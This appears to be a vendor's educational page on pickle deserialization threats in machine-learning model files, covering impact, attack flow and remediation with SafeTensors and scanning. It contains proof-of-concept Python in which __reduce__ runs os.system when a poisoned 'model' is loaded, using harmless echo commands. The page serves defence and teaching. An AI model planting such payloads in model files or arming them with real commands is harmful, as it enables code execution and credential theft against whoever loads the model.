Understanding Model Threats

This resource is designed to provide detailed information on various threat categories, helping you understand and mitigate potential risks in AI and machine learning systems.

Deserialization Threats

Deserialization threats occur when untrusted data or code is used to reconstruct objects, opening the door to exploitation. In AI and machine learning systems, this can allow malicious actors to inject harmful code during the deserialization process, exploiting vulnerabilities to gain unauthorized access or manipulate your system's behavior. Understanding deserialization threats is crucial for securing data integrity and preventing unauthorized code execution in your AI models.

Overview

Deserialization threats in AI and machine learning systems pose significant security risks, particularly for models serialized with Pickle, Python's default serialization tool.

If a model reportedly has this issue, it means:

  1. The model is serialized using Pickle.
  2. The model contains potentially malicious code that will run when the model is loaded.

Pickle is Python's original serialization module, used to serialize and deserialize Python objects so they can be shared between processes or machines. While convenient, Pickle poses significant security risks when used with untrusted data, because it can execute arbitrary code during deserialization. This makes it vulnerable to remote code execution attacks if an attacker can control the serialized data.

In this case, loading the model executes whatever malicious instructions have been inserted into it.
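
As a concrete illustration, here is a minimal sketch (with a harmless echo command standing in for a real payload) of how unpickling attacker-controlled data can execute an arbitrary function:

```python
import os
import pickle

class MaliciousPayload:
    # __reduce__ tells pickle how to rebuild an object. Returning a callable
    # and its arguments means pickle calls that callable during deserialization.
    def __reduce__(self):
        # A real attacker would run something far worse than a harmless echo.
        return (os.system, ("echo 'code executed during unpickling'",))

malicious_bytes = pickle.dumps(MaliciousPayload())

# The victim only has to load the data for the payload to run.
pickle.loads(malicious_bytes)
```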

Key Points:

  1. Model serialization converts trained models to a storable format
  2. Many frameworks use Python's pickle for serialization
  3. pickle can execute arbitrary embedded code when deserializing
  4. Attackers can inject malicious code into pickled models
  5. Loading compromised models runs the malicious code
  6. Only load models from trusted sources or use safer formats

Background Information

Further reading:

  1. Never a dill moment: Exploiting machine learning pickle files (Trail of Bits).
  2. https://protectai.com/blog/announcing-modelscan
  3. https://protectai.com/guardian

Impact

This attack can harm your organization in the following ways:

  1. Exposing data scientists' or company GitHub credentials to the attacker.
  2. Exposing data scientists' or company cloud credentials, enabling theft of data and other models and, in the worst case, full cloud account takeover.
  3. Altering the behavior of deployed models, enabling fraud, degraded model performance, and adversarial bypasses.
  4. Corrupting other models by using stolen credentials to rewrite known model assets within your environments.

How The Attack Works:

  1. An attacker embeds a malicious payload in a Pickle-serialized model, typically by controlling how the object is reconstructed during deserialization.
  2. The poisoned model is distributed through a model hub, shared repository, or internal artifact store.
  3. A data scientist or automated pipeline downloads the model and loads it with a Pickle-based loader.
  4. Deserialization executes the embedded payload with the permissions of the loading process, giving the attacker a foothold for the impacts described above.
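
A minimal end-to-end sketch of this flow is shown below; the filename and payload are purely illustrative, with a harmless shell command standing in for real credential theft. The same loading behavior applies to any Pickle-based loader (for example, torch.load without weights_only=True).

```python
import os
import pickle

# --- Attacker side --------------------------------------------------------
# The attacker wraps a payload in an object whose reconstruction runs code,
# saves it as a "model" file, and publishes it (model hub, shared repo, etc.).
class PoisonedModel:
    def __reduce__(self):
        # Stand-in payload: a real one might read GitHub or cloud credentials
        # and send them to an attacker-controlled server.
        return (os.system, ('echo "payload running as $(whoami) in $HOME"',))

with open("finetuned_model.pkl", "wb") as f:  # hypothetical filename
    pickle.dump(PoisonedModel(), f)

# --- Victim side ----------------------------------------------------------
# The victim downloads the file and loads it. Deserialization executes the
# payload with whatever permissions and credentials the victim process has.
with open("finetuned_model.pkl", "rb") as f:
    model = pickle.load(f)
```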

Remediation

If possible, use a different model format, such as SafeTensors, so this type of code injection attack cannot affect your work at all.
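
For example, here is a minimal sketch (assuming a PyTorch model and the safetensors package; the architecture and filenames are illustrative) of saving and loading weights with SafeTensors instead of Pickle:

```python
import torch
from safetensors.torch import save_file, load_file

# SafeTensors stores only tensor data plus a small header, so loading a file
# cannot execute arbitrary code the way unpickling can.
model = torch.nn.Linear(16, 4)

# Save the state dict (a flat name -> tensor mapping) rather than pickling
# the whole Python object.
save_file(model.state_dict(), "model.safetensors")

# Loading returns plain tensors; rebuild the architecture in code and copy
# the weights in.
fresh_model = torch.nn.Linear(16, 4)
fresh_model.load_state_dict(load_file("model.safetensors"))
```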

If that is not possible, reach out to the model creator and alert them that the model has failed our scan. You can also link to the specific page in our Insights Database to provide our most up-to-date findings.

The model provider should also report what they did to correct this issue as part of their release notes.

Protect AI's security scanner detects threats in model files
With Protect AI's Guardian you can scan models for threats before ML developers download them for use, and apply policies based on your risk tolerance.